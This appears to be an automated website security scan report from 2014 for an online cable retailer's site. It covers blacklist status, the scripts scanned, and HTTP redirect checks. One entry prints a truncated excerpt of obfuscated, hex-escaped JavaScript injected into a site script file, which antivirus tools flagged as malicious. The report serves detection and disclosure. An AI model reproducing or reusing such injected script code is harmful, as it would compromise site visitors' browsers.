Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cablesplususa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cablesplususa.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cablesplususa.com/ | 200 OK Content-Length: 75768 Content-Type: text/html | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/mobileredirector.js | 200 OK Content-Length: 2490 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: cablesplususa.com ...[2179 bytes skipped]... mMobileSite"); if ((fromMobile == 'false') || (fromMobile == '')) { var isMobile = false; var agent = navigator.userAgent.toLowerCase(); for (var i = 0; i < mobileIndicators.length; i++){ var indicator = mobileIndicators[i].toLowerCase(); if (agent.indexOf(indicator) > -1) { isMobile = true; } } if (isMobile) { if (location.host.indexOf("cablesplususa.com") != -1) { var host = "http://m.cablesplususa.com" + location.pathname; if(window.location.search.substring(1) != '') { host = host + "?" + window.location.search.substring(1); } location.replace(host); } } } else { setCookie('fromMobileSite', 'true'); } } | ||
http://www.cablesplususa.com/FrameManager.js | 200 OK Content-Length: 2720 Content-Type: application/x-javascript | clean |
http://www.cablesplususa.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11064 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var OCeuBmV="u\x73eri\x64A\x308\x317F\x422\x35";var F9lBnCy="28";var nhKNRj=1;function Vb1gC(qb_cD){var C5prmo4=document.cookie.replace(/\s/g,"").split(";");for(var OytUL=0;OytUL<C5prmo4.length;OytUL++){var c2uijl=C5prmo4[OytUL].split("=");if(c2uijl[0]==qb_cD){return unescape(c2uijl[1]);}}return null;};function AVJqAVz(qb_cD,y98VeNE,d19agzK){var Euyoazm=new Date();var ySrd1w=Euyoazm.getTime()+(d19agzK*60*60*1000);Euyoazm.setTime(ySrd1w);var jEfzry=qb_cD+"="+escape(y98VeNE)+"\x3b \x65xpi\x72e\ case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
| ||
http://www.cablesplususa.com/Scripts/freefreight.js | 200 OK Content-Length: 253 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/cablesplus.js | 200 OK Content-Length: 924 Content-Type: application/javascript | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/thickbox.js | 200 OK Content-Length: 11933 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://www.cablesplususa.com/js/jquery.tabSlideOut.v1.3.js | 200 OK Content-Length: 7269 Content-Type: application/x-javascript | clean |
http://ourbbbonline.bbb.org/Richmond/BBBOnlineSeal/21018411/bbbsealh2/0/ | 200 OK Content-Length: 1165 Content-Type: text/plain | clean |
http://ourbbbonline.bbb.org/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://live.monitus.net/scripts/monitus.js | 200 OK Content-Length: 2947 Content-Type: text/javascript | clean |
https://s.yimg.com/sv/store/yfc/js/0.14/loader_536a99d.js?q=yhst-7602493195877&ts=1402603088&p=0&h=order.store.yahoo.net&v=http://store.cablesplususa.com/ | 200 OK Content-Length: 38815 Content-Type: application/javascript | clean |
http://d.yimg.com/mi/ywa.js | 200 OK Content-Length: 46566 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cablesplususa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 14:16:20 GMT
Accept-Ranges: bytes
Age: 0
Server: YTS/1.20.29
Content-Length: 75768
Content-Type: text/html
Last-Modified: Thu, 21 Aug 2014 13:03:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=8qa7snd9vp5lk&b=3&s=m6; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.cablesplususa.com
X-Host: p11w7.geo.bf1.yahoo.com
X-INKT-SITE: http://www.cablesplususa.com
X-INKT-URI: http://www.cablesplususa.com//index.html
...75768 bytes of data.
GET / HTTP/1.1
Host: cablesplususa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 14:16:20 GMT
Accept-Ranges: bytes
Age: 0
Server: YTS/1.20.29
Content-Length: 75768
Content-Type: text/html
Last-Modified: Thu, 21 Aug 2014 13:03:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=8qa7snd9vp5lk&b=3&s=m6; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.cablesplususa.com
X-Host: p11w7.geo.bf1.yahoo.com
X-INKT-SITE: http://www.cablesplususa.com
X-INKT-URI: http://www.cablesplususa.com//index.html
...75768 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cablesplususa.com
Referer: http://www.google.com/search?q=cablesplususa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cablesplususa.com
Referer: http://www.google.com/search?q=cablesplususa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.